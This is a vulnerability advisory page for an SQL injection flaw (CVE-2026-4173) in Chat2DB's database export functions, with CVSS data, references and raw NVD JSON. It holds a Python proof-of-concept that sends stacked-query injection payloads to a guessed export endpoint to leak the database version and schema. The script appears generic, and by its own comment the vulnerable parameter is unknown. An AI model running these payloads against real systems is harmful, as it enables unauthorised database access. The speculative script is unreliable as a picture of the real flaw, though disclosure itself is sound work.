CVE-2026-4173

Description

A flaw has been found in CodePhiliaX Chat2DB up to 0.3.7. This vulnerability affects the function exportTable/exportTableColumnComment/exportView/exportProcedure/exportTriggers/exportTrigger/updateProcedure of the file DMDBManage.java of the component Database Export Handler. This manipulation causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CodePhiliaX Chat2DB < 0.3.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-4173 SQL Injection PoC for CodePhiliaX Chat2DB
# Vulnerability in Database Export Handler (DMDBManage.java)
# Affected: CodePhiliaX Chat2DB <= 0.3.7

import requests
import json

TARGET_URL = "http://target:8080/api/export"

def exploit_sql_injection():
    """
    SQL Injection payload for exportTable function
    This PoC demonstrates how an attacker could extract database information
    """
    
    # Malicious payload to extract database version information
    # The actual exploitation depends on the specific parameter vulnerable
    payload = {
        "tableName": "users; SELECT * FROM (SELECT version()) AS sqli_result;--",
        "exportFormat": "json"
    }
    
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <low_privilege_token>"
    }
    
    try:
        # Attempt to exploit the SQL injection vulnerability
        response = requests.post(
            f"{TARGET_URL}/exportTable",
            json=payload,
            headers=headers,
            timeout=10
        )
        
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        # Check if injection was successful
        if "PostgreSQL" in response.text or "MySQL" in response.text or "version" in response.text.lower():
            print("[+] SQL Injection Successful! Database information leaked.")
            return True
        else:
            print("[-] Injection may have failed or no data returned.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def extract_data():
    """
    Extract sensitive data using SQL injection
    """
    # Payload to extract all tables from the database
    data_extraction_payload = {
        "tableName": "information_schema.tables; SELECT table_name FROM information_schema.tables;--",
        "exportFormat": "json"
    }
    
    # This would be used to enumerate database schema
    pass

if __name__ == "__main__":
    print("[*] CVE-2026-4173 SQL Injection PoC")
    print("[*] Target: CodePhiliaX Chat2DB <= 0.3.7")
    print("[*] Component: DMDBManage.java Database Export Handler")
    exploit_sql_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4173
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4173
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4173/
[4] VulDB https://vuldb.com/cve/CVE-2026-4173
[5] https://github.com/AnalogyC0de/public_exp/issues/21
[6] https://vuldb.com/?ctiid.351080
[7] https://vuldb.com/?id.351080
[8] https://vuldb.com/?submit.769775

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4173", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:57.663", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in CodePhiliaX Chat2DB up to 0.3.7. This vulnerability affects the function exportTable/exportTableColumnComment/exportView/exportProcedure/exportTriggers/exportTrigger/updateProcedure of the file DMDBManage.java of the component Database Export Handler. This manipulation causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una falla en CodePhiliaX Chat2DB hasta la versión 0.3.7. Esta vulnerabilidad afecta a la función exportTable/exportTableColumnComment/exportView/exportProcedure/exportTriggers/exportTrigger/updateProcedure del archivo DMDBManage.java del componente Gestor de Exportación de Base de Datos. Esta manipulación provoca inyección SQL. Es posible iniciar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/AnalogyC0de/public_exp/issues/21", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351080", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351080", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769775", "source": "[email protected]"}]}}